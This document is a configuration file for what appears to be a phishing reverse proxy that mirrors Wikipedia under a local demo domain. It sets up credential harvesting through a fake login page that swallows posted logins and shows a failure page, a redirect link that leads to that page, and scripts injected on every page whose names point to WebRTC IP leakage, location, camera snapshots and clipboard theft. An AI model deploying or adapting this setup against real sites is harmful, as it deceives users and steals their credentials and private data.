listener = "0.0.0.0:8080"
#tlslistener = "0.0.0.0:8443"

#data = "/data"
#elasticsearch_url = "http://127.0.0.1:9200"

#socks = "socks4://127.0.0.1:9050"

[[host]]
host = "wikipedia.lvh.me"
target = "https://en.wikipedia.org"

[[host.action]]
path = "^.*"
action = "inject"
method = ["GET"]
scripts = ["injects/webrtc.js", "injects/location.js", "injects/snap.js", "injects/clipboard.js"]

[[host.action]]
path = "^/dump"
action = "serve"
content_type = "text/plain"
body = ""

[[host.action]]
path = "^/.*"
action = "replace"
regex = "Wikipedia"
replace = "Blikipedia"

[[host.action]]
path = "/w/index.php.*?Special:UserLogin"
action = "file"
method = ["GET"]
file = "static/login.html"

[[host.action]]
path = "^/login.html"
action = "file"
method = ["POST"]
file = "static/login-failed.html"

[[host.action]]
path = "^/shorturl"
statuscode = 302
action = "redirect"
location = "/login.html"

[[logging]]
output = "stdout"
level = "info"
